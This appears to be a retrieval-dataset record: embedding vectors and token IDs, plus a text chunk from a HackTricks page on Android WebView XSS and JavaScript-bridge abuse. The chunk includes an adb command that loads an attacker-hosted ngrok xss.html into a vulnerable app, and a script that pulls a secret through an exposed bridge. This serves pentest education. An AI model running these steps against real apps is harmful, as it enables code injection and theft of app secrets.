0.14207607507705688, 1.0070219039916992, 0.306682825088501, -0.2992214262485504, -0.4376598596572876, 0.12509000301361084, -0.5313230156898499, 0.200903058052063, -0.38995715975761414, -0.3067404329776764, -0.6910534501075745, 0.08128868043422699, -1.217448353767395, 0.29396599531173706, -0.11748344451189041, 0.22680902481079102, 0.04722535237669945, 0.14351294934749603, 0.20288875699043274, -0.17653371393680573, 0.35141482949256897, -1.4536993503570557, 4.38779878616333, 0.22305406630039215, 0.16608379781246185, 0.014022432267665863, 0.8794023394584656, 0.6730232834815979, 1.0756043195724487, -0.8521268963813782, -0.06076274812221527, -0.25708040595054626, 0.38620951771736145, -0.4512033462524414, 0.44421622157096863, 0.24681279063224792, -0.003672434249892831, 0.28546443581581116, -0.692406952381134, -0.23785337805747986, 0.40294739603996277, -1.2312231063842773, -0.8371695876121521, 0.2458600550889969, -0.8962564468383789, 0.2379632145166397, 0.6394869685173035, 0.22920463979244232, 0.009862766601145267, -0.792295515537262, 0.03158796951174736, -0.518925666809082, 0.08368664979934692, -0.23644523322582245, 0.372700035572052, 0.2272813618183136, -0.7201175689697266, 0.106409952044487, 0.06084596365690231, -0.9815499186515808, 0.066059410572052, 0.5884045958518982, -0.18665798008441925, -0.24774111807346344, -0.18365809321403503, -0.6688241362571716, 0.07063905149698257, 0.6203624606132507, -0.48118945956230164, 0.2768584191799164, 0.712640643119812, -0.5656307935714722, 1.1525386571884155, 0.47644996643066406, 0.36736443638801575, 0.5577923059463501, -0.5868157148361206, 0.2802276015281677, -0.022537710145115852, 0.10715727508068085, 0.27523839473724365, 0.1426261067390442, 0.7421113848686218, -0.32949477434158325, -0.15102677047252655, -0.20714731514453888, -0.9000532031059265, 0.19258509576320648, -0.24406743049621582, 0.6160887479782104, 0.29026368260383606, -0.1835392564535141, 0.15389561653137207, -0.2690780460834503, -0.28563985228538513, 0.041124891489744186, 0.4790109395980835, -0.08604442328214645, 0.20729859173297882, 0.30363357067108154, 0.88579922914505, -0.3430342674255371, -0.011253993958234787, -0.5222955346107483, -0.7055768370628357, 0.32150840759277344, 0.8196228742599487, 0.9800273776054382, -0.3202362656593323, -1.0817842483520508, -0.5743281841278076, 0.22057220339775085, 0.10270438343286514, 0.09626521915197372, -0.4834056794643402, 0.026775401085615158, 0.16095741093158722 ]
[ 4995, 1005, 1056, 5360, 2011, 2023, 4292, 1012, 2123, 1005, 1056, 9585, 2023, 4292, 2065, 2017, 2330, 6764, 2008, 2089, 2022, 2580, 2030, 8776, 2011, 6327, 4216, 1012, 12067, 2023, 4292, 4473, 24391, 14546, 8209, 1999, 1037, 5371, 1024, 1013, 1013, 6123, 2000, 3229, 15275, 2334, 6764, 2164, 4773, 8584, 16324, 1998, 10439, 2797, 2951, 1012, 1999, 12654, 1010, 2023, 16263, 9262, 22483, 2000, 3229, 2334, 6764, 3081, 5371, 1024, 1013, 1013, 8778, 1012, 3602, 2008, 1996, 3643, 1997, 2023, 4292, 2003, 6439, 2065, 1996, 3643, 1997, 2131, 8095, 5004, 19496, 14028, 7911, 9468, 7971, 19699, 5358, 8873, 2571, 3126, 4877, 1006, 1007, 2003, 2995, 1012, 1996, 12398, 3643, 2003, 6270, 2043, 14126, 3857, 1012, 2544, 1035, 9537, 1012, 20919, 1035, 14068, 1998, 2682, 1012, 2224, 2131, 8095, 5004, 8873, 19738, 9468, 7971, 19699, 5358, 8873, 2571, 3126, 4877, 1006, 1007, 2000, 2113, 3251, 9262, 22483, 2003, 2770, 1999, 1996, 6123, 1997, 1037, 5371, 5679, 24471, 2140, 2064, 3229, 4180, 2013, 2060, 5371, 5679, 24471, 4877, 1012, 2224, 2275, 8095, 5004, 8873, 19738, 9468, 7971, 19699, 5358, 8873, 2571, 3126, 4877, 1006, 22017, 7770, 1007, 2000, 9585, 1013, 4487, 19150, 2009, 1012, 5371, 3229, 8189, 13510, 2030, 4487, 19150, 2015, 5371, 3229, 2306, 4773, 8584, 1012, 3602, 2008, 2023, 12939, 2030, 4487, 19150, 2015, 5371, 2291, 3229, 2069, 1012, 7045, 1998, 4219, 2024, 2145, 7801, 2478, 5371, 1024, 1013, 1013, 1013, 11924, 1035, 11412, 1998, 5371, 1024, 1013, 1013, 1013, 11924, 1035, 24501, 1012, 1999, 12654, 1010, 2065, 4487, 19150, 1010, 1996, 4773, 8584, 2180, 1005, 1056, 2022, 2583, 2000, 7170, 1037, 2334, 5371, 2007, 1996, 5371, 1024, 1013, 1013, 8778, 1012, 1996, 12398, 3643, 2003, 7011, 4877, 2063, 2043, 14126, 3857, 1012, 2544, 1035, 9537, 1012, 1054, 1998, 2682, 1012, 2224, 2131, 8095, 5004, 8873, 19738, 9468, 7971, 1006, 1007, 2000, 2113, 2065, 1996, 9563, 2003, 9124, 1012, 2224, 2275, 8095, 5004, 8873, 19738, 9468, 7971, 1006, 22017, 20898, 1007, 2000, 9585, 1013, 4487, 19150, 2009, 1012, 4773, 8584, 27241, 19646, 10441, 4063, 16001, 4842, 2465, 2000, 7170, 2334, 6764, 2164, 4646, 1005, 1055, 10763, 7045, 1998, 4219, 2478, 24471, 2140, 24471, 4877, 2503, 1037, 4773, 8584, 2465, 1012, 10578, 2334, 6764, 2478, 4773, 1011, 2066, 24471, 4877, 2612, 1997, 1000, 5371, 1024, 1013, 1013, 1000, 2003, 16166, 2004, 2009, 2003, 11892, 2007, 1996, 2168, 1011, 4761, 3343, 1012, 2023, 2003, 2047, 6749, 2126, 2000, 7170, 2334, 6764, 1012, 1996, 3125, 2003, 2000, 3229, 2334, 6764, 2478, 1037, 8299, 24471, 2140, 2007, 1996, 5884, 1012, 2023, 2126, 1996, 2522, 2869, 2064, 2022, 4089, 5224, 2090, 1996, 2334, 4773, 5530, 1998, 1996, 4773, 5530, 2008, 2024, 22817, 2013, 1996, 4773, 8241, 1012, 9262, 22483, 9124, 8545, 2497, 8584, 2015, 2031, 9262, 22483, 9776, 2011, 12398, 1012, 1996, 4118, 2275, 3900, 12044, 23235, 8189, 23242, 1006, 1007, 2003, 2064, 12045, 12067, 2030, 4487, 3736, 9709, 2009, 1012, 3602, 2008, 4773, 8584, 2015, 2064, 2036, 2490, 1996, 7848, 5679, 2008, 4473, 2000, 2543, 2060, 5097, 1012, 3191, 2023, 4339, 6279, 2000, 2424, 2129, 2000, 2175, 2013, 1060, 4757, 2000, 22110, 2063, 1012, 2182, 2003 ]
hack_tricks
427.txt
1
an example of an exposed webview vulnerable to xss via the parameter " support _ url " ( which can indicate the url to load in the webviwe ) : it's possible to exploit that vuln from adb with something like : adb. exe shell am start - n com. tmh. vulnwebview /. supportwebview – es support _ url " https : / / 6333 - 157 - 48 - 216 - 175. ngrok - free. app / xss. html " javascript bridgeandroid offers a way for javascript executed in a webview to call and use native functions of an android app ( annotated with @ javascriptinterface ) by using the addjavascriptinterface method. this is known as a webview javascript bridge or native bridge. please note that when you use addjavascriptinterface, you're explicitly granting access to the registered javascript interface object to all pages loaded within that webview. this implies that, if the user navigates outside your app or domain, all other external pages will also have access to those javascript interface objects which might present a potential security risk if any sensitive data is being exposed though those interfaces. warning : take extreme care with apps targeting android versions below android 4. 2 ( api level 17 ) as they are vulnerable to a flaw in the implementation of addjavascriptinterface : an attack that is abusing reflection, which leads to remote code execution when malicious javascript is injected into a webview. this was due to all java object methods being accessible by default ( instead of only those annotated ). static analysis / / class with a method to access a secretpublic class javascriptbridge { / / since android 4. 2 ( jelly _ bean _ mr1, api 17 ) methods / / not annotated with @ javascriptinterface are not visible from javascript @ javascriptinterface public string getsecret ( ) { return " supersecretpassword " ; } ; } / / enabling javascript bridge exposing an object of the javascriptbridge classwebview. addjavascriptinterface ( new javascriptbridge ( ), " javascriptbridge " ) ; webview. reload ( ) ; <! - - exploit to get the secret from javascript - - > < script > alert ( javascriptbridge. getsecret ( ) ) ; <
[ 0.33990752696990967, 0.17024481296539307, -0.6890305280685425, -0.016827654093503952, -0.4945237338542938, 0.2965236008167267, 0.10711229592561722, -0.018112819641828537, 0.9525071382522583, 1.078620195388794, -0.44414570927619934, 0.5802635550498962, 0.40158966183662415, -0.1318422555923462, -0.4463488459587097, 0.12640607357025146, -0.43657079339027405, 0.14479999244213104, -0.26978856325149536, 0.2658007740974426, 0.4830527603626251, 0.3881443738937378, -0.8795670866966248, -1.1840763092041016, -0.41486987471580505, 0.19040551781654358, 0.15603701770305634, -0.8567062020301819, 0.42447197437286377, 0.9440090656280518, 0.2515946924686432, -0.3158094882965088, -0.1812952160835266, -0.9461707472801208, -0.41169822216033936, -0.5141434669494629, 0.4869665503501892, -0.608471155166626, -0.03297047317028046, -0.7421963214874268, 0.26714757084846497, -0.42356622219085693, -0.2123236507177353, -0.539309024810791, -0.6226518154144287, -0.1965937316417694, 0.25718194246292114, 0.10023218393325806, -0.16721510887145996, 0.116841159760952, 0.7100841999053955, 0.3342428505420685, -0.3674945831298828, -0.14445562660694122, 0.2144540399312973, 0.09381715208292007, -0.1350734829902649, -0.31094759702682495, -0.7494807243347168, 0.005800084676593542, 0.08822598308324814, 0.8409788012504578, 0.3050558269023895, -0.8267555236816406, 0.26571977138519287, 0.5061661005020142, 0.10624952614307404, -0.7463574409484863, -0.2448485791683197, -0.07208476215600967, -0.5173788070678711, 0.6905199885368347, -0.6221593618392944, -0.5210974216461182, -0.9481614232063293, 0.06584692001342773, -0.7253372669219971, -0.04685824736952782, 0.1515834480524063, 0.12011675536632538, -0.02504013665020466, 0.518488347530365, 0.27083271741867065, -0.15448835492134094, -0.3327483534812927, 0.19209690392017365, 0.6718020439147949, 0.7904349565505981, -0.9431621432304382, 0.7859390377998352, 0.10686010122299194, 0.47442686557769775, -1.2447117567062378, 0.09531759470701218, 0.6296742558479309, 0.5721055269241333, 0.016917340457439423, -0.11988690495491028, 0.04452867805957794, -0.19034482538700104, 0.452959269285202, 0.8215430974960327, -0.3721633553504944, 0.16239117085933685, -0.14917567372322083, 0.8730853199958801, 0.022829178720712662, -0.09033138304948807, -0.5358357429504395, -0.5136016011238098, -0.23156210780143738, -0.24884848296642303, 0.5499427318572998, -0.741682767868042, 0.3646756112575531, 0.6796876788139343, 0.3177342414855957, -0.48714518547058105, -0.1536848247051239, 0.29910048842430115, -0.15143954753875732, -0.49314168095588684, 0.25198400020599365, 0.21979732811450958, 0.5708880424499512, 0.7483552098274231, 0.28352388739585876, 0.8985374569892883, -0.30548524856567383, -0.4716118276119232, -0.1954212337732315, 0.3115886449813843, -0.04434121027588844, 0.738468587398529, -0.47135692834854126, -0.2586545944213867, 0.622012734413147, 0.27562063932418823, 0.731508731842041, -0.8476513624191284, -0.027443625032901764, 0.6285626292228699, 0.5451622605323792, 1.101522445678711, 0.13230659067630768, -0.5457459092140198, -0.45834964513778687, -0.6206974387168884, -0.5600563883781433, 0.08365455269813538, 0.14319796860218048, 0.027995843440294266, 0.5941754579544067, -0.26785650849342346, -0.4317515194416046, -0.039356060326099396, -0.3060228228569031, 0.3750721216201782, 0.3595287799835205, -0.5483638644218445, -0.10301920026540756, 1.1365206241607666, -0.9095412492752075, 0.278067022562027, -0.2905026078224182, 0.12345696985721588, -0.572295606136322, -0.2803173363208771, 0.15697160363197327, -0.35175472497940063, 0.22369061410427094, 0.3585529923439026, 0.10327272862195969, 0.2265993356704712, 1.6252251863479614, 0.9353345632553101, -0.2826811969280243, -0.6576524376869202, 0.005256101954728365, 0.37329792976379395, -0.04276686906814575, 0.7322611212730408, 0.3780834972858429, 1.2827638387680054, 0.12496362626552582, -0.23640547692775726, -0.021222414448857307, -0.9379497170448303, 0.097236268222332, 0.1946662962436676, 0.3859344720840454, 0.771482527256012, -0.4867717921733856, 0.45390355587005615, 0.7181345224380493, -0.016469335183501244, -1.0101648569107056, -0.26621097326278687, 0.11290285736322403, -1.0770632028579712, -0.4298795759677887, 0.31610608100891113, -0.24969470500946045, 0.5314589142799377, -0.6042002439498901, -0.2137587070465088, 0.8505032658576965, 0.5468114614486694, -0.3519539535045624, 1.0893774032592773, 0.22386087477207184, 0.050395719707012177, -0.1772083342075348, -0.1518314629793167, 0.35645321011543274, -0.23714928328990936, -0.6845412850379944, 0.2684348225593567, 0.3431686460971832, -0.05230799689888954, -0.2743343412876129, 0.8888709545135498, 0.9797657132148743, 0.8336862325668335, -0.45795854926109314, -0.200514018535614, 0.06448902189731598, 0.2664753198623657, -0.3675422668457031, 0.13128630816936493, 0.5255626440048218, 0.797051727771759, 0.5383824706077576, 1.1230340003967285, 0.07738838344812393, 0.03538241609930992, -0.19855311512947083, 0.3135107457637787, 0.11842488497495651, -0.29051896929740906, -0.32536742091178894, 1.0564032793045044, 0.4282192587852478, 0.7730264663696289, 0.3469286561012268, 0.28944939374923706, 0.013783488422632217, 0.4598964750766754, 0.44608405232429504, 0.7365549206733704, 0.13329678773880005, 0.6501091718673706, 0.6213119029998779, -0.24937057495117188, -0.951665461063385, -0.33280545473098755, 0.6938850283622742, 0.5198121070861816, -0.7803954482078552, -0.6164807081222534, -0.0598720982670784, 0.4239620566368103, -0.3247358798980713, -0.5203238725662231, 0.5140507817268372, 0.09968984127044678, 0.3965015709400177, 0.6792921423912048, -0.7372844219207764, -0.7151056528091431, -0.8631628155708313, -0.42285123467445374, -0.9191314578056335, -0.6488527655601501, -1.0245448350906372, -0.053468864411115646, 0.08113130182027817, -0.8685787320137024, 0.3840221166610718, -0.18795886635780334, -0.3742677569389343, -0.021862296387553215, -0.03773967921733856, 0.8671719431877136, 0.5116732120513916, 0.27894750237464905, -0.12789081037044525, -0.09457571804523468, -0.4175853729248047, 0.7509458661079407, -0.7701501250267029, -0.12530726194381714, -0.008762402459979057, 0.08417078107595444, -0.5635913610458374, 0.11104825139045715, 0.4798020124435425, 0.5090239644050598, -0.13769954442977905, 0.012408720329403877, -0.03286014124751091, -0.2918313443660736, 0.05112465098500252, -0.06358491629362106, -0.49858754873275757, 0.5282508134841919, -0.1891191601753235, -0.04170362651348114, 0.9612869024276733, 0.5177099108695984, -0.5870977640151978, 0.6667321920394897, 0.30848240852355957, 0.5353941917419434, -0.6257378458976746, 0.31948232650756836, 0.1543666273355484, 0.594881534576416, -0.2120717465877533, -0.17093466222286224, 0.1473080813884735, -0.16915765404701233, -0.6814602613449097, -0.016841379925608635, -0.6080647706985474, 0.5556337237358093, -0.3677830696105957, -1.0618906021118164, -0.06993085145950317, -0.7488154172897339, -0.23123739659786224, -0.678526759147644, 0.1619333028793335, 0.4688144028186798, 0.6468916535377502, 0.20934882760047913, 0.39588305354118347, -0.1965072602033615, 0.2694483995437622, -0.45647042989730835, 0.25048181414604187, -0.807269275188446, 0.4785710573196411, 0.20418719947338104, 0.3063504993915558, 0.18782387673854828, 0.2971270680427551, -0.422111451625824, 0.12819978594779968, -0.27143463492393494, -0.8212824463844299, -0.4339660108089447, 0.0435304269194603, -0.005673832725733519, 0.35170161724090576, 0.8078179359436035, -0.5293191075325012, 0.13351644575595856, 0.19898419082164764, 0.12264413386583328, 0.8635725975036621, 0.044864702969789505, 0.246458038687706, -0.026409678161144257, -0.38277044892311096, -0.7654370665550232, 0.1509230136871338, 0.1734292060136795, 0.6005648970603943, 0.1885191798210144, 0.06560224294662476, -0.5336772799491882, -0.34342315793037415, 0.5549103617668152, -0.12408781796693802, -0.8611894249916077, 0.9226589202880859, -0.13386815786361694, 0.5962883830070496, -0.3051694631576538, -0.2609516382217407, -0.17932483553886414, 0.21605396270751953, 1.3250387907028198, 0.031769733875989914, -0.07697208970785141, -0.2645302414894104, -0.44854819774627686, 0.39900174736976624, 0.5369757413864136, -0.025147927924990654, 0.2122095376253128, 0.27099451422691345, 0.003708516713231802, -0.7247944474220276, -0.4382033348083496, 0.2616676688194275, 0.4684680104255676, 0.13090693950653076, 0.12199084460735321, 0.7290204167366028, 0.17486076056957245, -0.14205674827098846, 0.42963239550590515, -0.5410143136978149, 0.1897532343864441, -0.6741554737091064, 0.6389932036399841, 0.25228095054626465, -0.030944783240556717, -0.406026691198349, 0.11475978046655655, -0.3565612733364105, -0.43561869859695435, 0.336537629365921, -0.3666844964027405, -0.26765239238739014, -0.7008699774742126, 0.6184988021850586, 0.8397891521453857, -0.45788636803627014, -0.5417484641075134, 0.1927608996629715, 0.12178480625152588, 1.149430751800537, -0.38998204469680786, 0.01111645344644785, -0.8560008406639099, 0.11344891041517258, 0.596534013748169, 0.49962684512138367, -0.07778597623109818, -1.1844427585601807, -0.49293166399002075, -0.03454318270087242, 0.29638364911079407, 0.5498663783073425, 0.06844137609004974, -0.2199694812297821, -1.0252387523651123, 0.178476020693779, 0.3471580743789673, -0.28890082240104675, -0.7376672625541687, -0.1323094218969345, 0.5373762249946594, 0.009374761953949928, 0.4406651258468628, -1.0466214418411255, 0.3165183365345001, 0.2448359876871109, -0.7475149631500244, 1.3616105318069458, -0.8344818353652954, 0.14626246690750122, -0.09214247763156891, -0.0835927203297615, -0.04567607119679451, 0.3834916055202484, -0.23027965426445007, -0.09288856387138367, -0.4908621311187744, -0.2968848943710327, -0.12669220566749573, -0.12311485409736633, 0.5635668039321899, 0.1694241762161255, -0.30040472745895386, 0.12283025681972504, 0.7461069822311401, 0.08482424914836884, 0.307134211063385, -0.34319794178009033, -0.47650328278541565, -0.08582034707069397, -0.75584477186203, 0.019998321309685707, 0.6997086405754089, -0.4804437458515167, 0.29890358448028564, -0.6173752546310425, 1.0074645280838013, 0.028708988800644875, 0.02721323072910309, -0.9726428985595703, -0.08671486377716064, -0.27624455094337463, -0.020780688151717186, 0.07370949536561966, 0.6967198848724365, 0.32542991638183594, -0.09198786318302155, -0.014865209348499775, 0.3325914740562439, -0.48479458689689636, -0.3841812312602997, 0.2374291718006134, -0.24413977563381195, 0.03900747001171112, -0.042560677975416183, 0.6941602230072021, -0.20185747742652893, -0.7504376173019409, -0.10367324203252792, 0.02158234268426895, 0.47058582305908203, -0.6680691838264465, -0.3830200135707855, -0.08227704465389252, -0.2535925507545471, 0.25750666856765747, 0.36615678668022156, -0.19623588025569916, 0.16645124554634094, 0.04342711716890335, 0.1494799256324768, 0.22667038440704346, -0.031306590884923935, -0.22003260254859924, 0.7141785025596619, 0.002826076466590166, -0.39749500155448914, 0.029387060552835464, 0.15199284255504608, -0.2352699190378189, 0.19556881487369537, 0.01424369029700756, -0.6595894694328308, -0.9272092580795288, -0.9689427018165588, 0.06988370418548584, -0.1717885136604309, 0.4272143840789795, -0.39745032787323, -0.18768727779388428, -0.9233787059783936, 0.8030277490615845, -0.21372628211975098, -0.7614054083824158, 0.09962593764066696, 0.029449645429849625, 0.6388949155807495, -0.075044184923172, -0.4772193431854248, -0.08141232281923294, -0.5411626696586609, 0.40076789259910583, 0.21081946790218353, 0.1997910439968109, 0.20200568437576294, -0.028926007449626923, 0.17125141620635986, 0.17422258853912354, -0.029323821887373924, -0.9754092693328857, -0.4796219766139984, -0.01871926710009575, -0.1381896585226059, -0.766129195690155, 0.17402884364128113, -0.6761733889579773, 0.416703462600708, 0.07437714189291, 0.40219101309776306, 0.24929720163345337, -0.43199607729911804, 0.3381894528865814, 0.06754040718078613, 0.4515739381313324, -0.7906061410903931, -0.14046047627925873, -0.3316531181335449, 0.5663027167320251, -0.34137213230133057, -0.31155022978782654, -0.7697175145149231, 0.4483281075954437, -1.1385573148727417, -0.9247954487800598, 0.3257107138633728, -0.4440569281578064, 0.16238044202327728, -0.08427070081233978, -0.7453247308731079, 0.8612846732139587, -0.11081060022115707, -0.032153159379959106, 0.6404752731323242, 0.1569404900074005, 0.45626193284988403, -0.0715644434094429, 0.14634230732917786, -0.008091435767710209, -0.37415388226509094, 0.3319064676761627, -0.0006833175430074334, -0.020140333101153374, 0.15778224170207977, -0.1589653193950653, -0.023188462480902672, -0.5604674816131592, -0.05676005780696869, 0.40839117765426636, -0.7559683918952942, 0.2602289617061615, 0.0891554206609726, -0.8868332505226135, -0.902842104434967, 0.17650505900382996, 0.31223738193511963, -0.10094873607158661, 0.6189854741096497, 0.31283968687057495, 0.1638878583908081, -0.4307454526424408, -0.4030652344226837, 0.00511620007455349, 0.035183824598789215, 0.47887247800827026, -0.3863249719142914, -0.1058521717786789, 0.3823055624961853, 0.410860151052475, -0.6633750796318054, -0.6101557612419128, -0.5254138112068176, -0.011884965002536774, 0.29342931509017944, -0.4050654470920563, -0.4398685395717621, 0.37009871006011963, 0.16498644649982452, -0.09855888038873672, 0.4843232035636902, 0.17239134013652802, 0.21649087965488434, -0.1376427710056305, 0.18916276097297668, 0.45531895756721497, 0.2870814800262451, 0.841940701007843, -0.41892632842063904, -0.06517764925956726, -0.4231081008911133, 0.027379736304283142, 0.21424102783203125, -0.14360032975673676, 1.4307870864868164, -0.7128848433494568, 0.8052245378494263, 0.2766927480697632, -0.07606266438961029, 0.8586682081222534, -0.3991057276725769, 0.25563257932662964, 1.2203134298324585, 0.2878160774707794, -0.6154592633247375, -0.2113810032606125, 0.17150843143463135, 0.5491815209388733, 0.4070914089679718, -0.13597072660923004, 0.17794208228588104, -0.11119671165943146, 0.29026222229003906, -0.42074134945869446, -0.3824469745159149, -0.9744381904602051, -0.9561483860015869, -0.4665568470954895, 0.655808687210083, 0.4029650092124939, -0.09395872801542282, -0.04501062631607056, -0.2837279140949249, -0.4161681830883026, -0.4923401176929474, 0.20141921937465668, -0.46538272500038147, 0.4060773253440857, -0.36964669823646545, -0.21313941478729248, -0.6670896410942078, -0.9193923473358154, -1.2179070711135864, -0.35921725630760193, 0.22411136329174042, -0.7248836159706116, -0.2622807025909424, -0.063917376101017, -0.5529437065124512, -0.1760992854833603, -0.8514600396156311, 0.5037569403648376, -0.4395487606525421, -0.7374821305274963, -0.17698539793491364, 0.5445763468742371, -0.2679055631160736, 0.07614533603191376, -0.05359833315014839, 0.4435570538043976, -0.17188800871372223, -0.14830483496189117, 0.24002191424369812, 0.3373434841632843, 0.5335049033164978, -0.2356032282114029, -0.10131131112575531, -0.3065367341041565, 0.03590148314833641, 0.2555176317691803, -0.21103237569332123, 0.12569767236709595, -0.2990887463092804, -0.5388972759246826, 0.35793814063072205, 0.20864933729171753, 0.4081684947013855, 0.8009035587310791, 0.2934360206127167, 0.3922167718410492, -0.5030242800712585, 0.9520374536514282, 0.612422525882721, 0.14347761869430542, 0.1133417934179306, -0.28042393922805786, 0.5932273864746094, 0.17812781035900116, -0.020612506195902824, -0.1059340164065361, -0.13209283351898193, 0.004484117031097412, 0.09048429131507874, 0.2566109895706177, -0.2157973349094391, -0.033972661942243576, 0.5344642996788025, 0.3826904296875, 0.35789868235588074, -0.0882745161652565, 0.37606728076934814, 0.2100285142660141, -0.6807163953781128, 0.27138280868530273, -0.9966967701911926, 0.11975021660327911, 0.5092025995254517, -0.5692825317382812, -0.6265440583229065, -0.707635223865509, -0.04145306721329689, -0.1706063598394394, 0.22670702636241913, -0.49065762758255005, 0.35771259665489197, 0.3560716509819031, 0.2906428575515747, 0.7771482467651367, -0.43684718012809753, -0.6802372932434082, -0.3024402856826782, 0.6175955533981323, -0.8561487793922424, -0.5494101643562317, 0.04379880428314209, 0.9762937426567078, 0.02454858459532261, -0.41253527998924255, -0.12357597798109055, -0.11406946927309036, 0.06484278291463852, 0.1384177803993225, 0.5241398811340332, 0.27611595392227173, -0.404774934053421, 0.6699619889259338, -0.9432154297828674, 0.3736768960952759, 0.28334906697273254, 0.2660163640975952, 0.09792017191648483, 0.18163609504699707, -0.1470659375190735, 0.3816986680030823, 0.43598607182502747, 0.10410287976264954, 0.465906023979187, 0.4378592073917389, 0.4831494987010956, -0.5294948220252991, -0.05681978166103363, -0.41283756494522095, -0.06071431189775467, 0.7585921883583069, -0.2020636647939682, 0.10767356306314468, 0.5499902963638306, 0.9679989218711853, -0.45596590638160706, -0.19312407076358795, 0.7519839406013489, -0.6041831374168396, -0.07412770390510559, -0.0011567254550755024, -0.10052242130041122, 0.13190126419067383, 0.049239058047533035, -0.41606399416923523, 0.33934175968170166, -0.33375319838523865, 0.13106079399585724, -0.20639365911483765, -0.7801073789596558, 1.0100114345550537, -0.8417806625366211, 0.6971579790115356, -0.366179496049881, -0.39532989263534546, 1.0352684259414673, 0.3220931589603424, -0.993353009223938, 0.48754313588142395, 0.8152274489402771, 0.6618338823318481, 0.03092925064265728, 0.25996458530426025, -0.351546049118042, 0.15309157967567444, 0.4793091118335724, -0.2916097640991211, -0.6633151769638062, 0.3475973904132843, 0.4752419888973236, -0.4162997305393219, -0.7090616822242737, -0.03830308839678764, 0.6822643280029297, 0.33280447125434875, 0.8022943735122681, -0.03727586939930916, 0.1148635521531105, -0.07632908970117569, 0.20176707208156586, -0.1832687109708786, -0.5568951368331909, 0.16148489713668823, 0.01654084399342537, -0.7754441499710083, 0.7051827907562256, 0.19854150712490082, 0.2365412414073944, -0.5864979028701782, 0.8548895120620728, -0.47724536061286926, -0.2490941882133484, 0.06421999633312225, -0.562891960144043, -0.7805662751197815, 0.40725651383399963, -0.26611268520355225, -0.16834214329719543, 0.06897728890180588, -0.44128939509391785, -0.0079037481918931, 0.0034269841853529215, -0.7657564282417297, -1.0180842876434326, 0.08932852745056152, -0.00695310952141881, -1.205448865890503, 0.12331241369247437, -0.1378524899482727, -0.6532559394836426, 0.013393682427704334, -0.128247931599617, -0.7912943959236145, 0.35036733746528625, -0.6063895225524902, -0.14055220782756805, 0.04451974108815193, -0.07089231163263321, -0.40037328004837036, 0.19913490116596222, -0.6631629467010498, -0.16596201062202454, 0.2554503083229065, -0.3056245446205139, -1.2812129259109497, 0.01096702553331852, 0.12574762105941772, -0.6073504686355591, 0.8386372923851013, 0.47608768939971924, 0.3411046266555786, 0.8482018709182739, -0.48302578926086426, -0.003805912099778652, 0.2853659391403198, 0.2904067635536194, -0.624143660068512, 0.7008451819419861, 0.40832391381263733, -0.22076044976711273, 0.5119168758392334, 0.02646546997129917, 0.9143120050430298, 0.135062113404274, -0.7940480709075928, -0.04999199137091637, 0.5036093592643738, -1.2154510021209717, -0.3624752461910248, 0.24852608144283295, -0.49680590629577637, -0.5977221727371216, -0.36025470495224, -1.3122586011886597, 0.24900299310684204, -0.14999832212924957, 0.24955643713474274, -0.1466013342142105, 0.04936293512582779, 0.41395261883735657, -0.49363183975219727, 0.376190721988678, -1.4733225107192993, 4.360231876373291, -0.029066337272524834, -0.427883505821228, -0.21943983435630798, 0.45607513189315796, 0.3199014365673065, 0.8744852542877197, -0.8933016657829285, -0.2792007327079773, -0.5093844532966614, 0.4524792730808258, -0.039363887161016464, 0.5627949833869934, 0.5229692459106445, 0.13734501600265503, 0.166734516620636, -0.9382040500640869, 0.02842579409480095, 0.2662734091281891, -1.0784094333648682, -0.7936068177223206, 0.1897469162940979, -0.34325462579727173, 0.12444772571325302, 0.15417879819869995, 0.054651618003845215, -0.1073567345738411, -0.5323118567466736, -0.5562472343444824, -0.7359921336174011, 0.2374822050333023, -0.07978979498147964, 0.3432745039463043, 0.039951905608177185, -0.9418662786483765, 0.17400260269641876, 0.10489994287490845, -0.82522052526474, -0.2405228465795517, 0.3864898085594177, 0.15544280409812927, -0.2713424563407898, 0.06797854602336884, -0.3387943208217621, 0.1589760035276413, 0.06878135353326797, -0.46480444073677063, -0.10201814770698547, 0.6195197105407715, -0.2794319689273834, 0.7097891569137573, -0.3602501451969147, 0.7073351144790649, -0.47562381625175476, -0.33277493715286255, 0.18243813514709473, 0.3163827359676361, -0.0037337085232138634, -0.22617660462856293, -0.02857130393385887, 0.39976316690444946, -0.6793914437294006, 0.03220730274915695, -0.14713840186595917, -1.1990513801574707, 0.028842903673648834, -0.5480732321739197, 0.4672259986400604, -0.24271684885025024, 0.14542222023010254, -0.40552613139152527, -0.2549797594547272, -0.05549417436122894, -0.1250883787870407, 0.9257797002792358, 0.2792625427246094, 0.19966058433055878, 0.4180976152420044, 1.415989637374878, -0.4315561056137085, 0.24585209786891937, 0.016173914074897766, -1.0116928815841675, 0.4677654802799225, 0.8541773557662964, 0.5701406598091125, -0.2408798784017563, -0.7615289092063904, -0.4095125198364258, 0.5875145196914673, 0.4043635427951813, 0.14567457139492035, 0.057497818022966385, -0.04688086360692978, 0.329028844833374 ]
[ 2019, 2742, 1997, 2019, 6086, 4773, 8584, 8211, 2000, 1060, 4757, 3081, 1996, 16381, 1000, 2490, 1035, 24471, 2140, 1000, 1006, 2029, 2064, 5769, 1996, 24471, 2140, 2000, 7170, 1999, 1996, 4773, 5737, 8545, 1007, 1024, 2009, 1005, 1055, 2825, 2000, 18077, 2008, 24728, 19666, 2013, 4748, 2497, 2007, 2242, 2066, 1024, 4748, 2497, 1012, 4654, 2063, 5806, 2572, 2707, 1011, 1050, 4012, 1012, 1056, 2213, 2232, 1012, 24728, 19666, 8545, 2497, 8584, 1013, 1012, 2490, 8545, 2497, 8584, 1516, 9686, 2490, 1035, 24471, 2140, 1000, 16770, 1024, 1013, 1013, 6191, 22394, 1011, 17403, 1011, 4466, 1011, 20294, 1011, 12862, 1012, 12835, 27923, 1011, 2489, 1012, 10439, 1013, 1060, 4757, 1012, 16129, 1000, 9262, 22483, 2958, 5685, 22943, 4107, 1037, 2126, 2005, 9262, 22483, 6472, 1999, 1037, 4773, 8584, 2000, 2655, 1998, 2224, 3128, 4972, 1997, 2019, 11924, 10439, 1006, 5754, 17287, 3064, 2007, 1030, 9262, 22483, 18447, 2121, 12172, 1007, 2011, 2478, 1996, 5587, 3900, 12044, 23235, 18447, 2121, 12172, 4118, 1012, 2023, 2003, 2124, 2004, 1037, 4773, 8584, 9262, 22483, 2958, 2030, 3128, 2958, 1012, 3531, 3602, 2008, 2043, 2017, 2224, 5587, 3900, 12044, 23235, 18447, 2121, 12172, 1010, 2017, 1005, 2128, 12045, 15080, 3229, 2000, 1996, 5068, 9262, 22483, 8278, 4874, 2000, 2035, 5530, 8209, 2306, 2008, 4773, 8584, 1012, 2023, 12748, 2008, 1010, 2065, 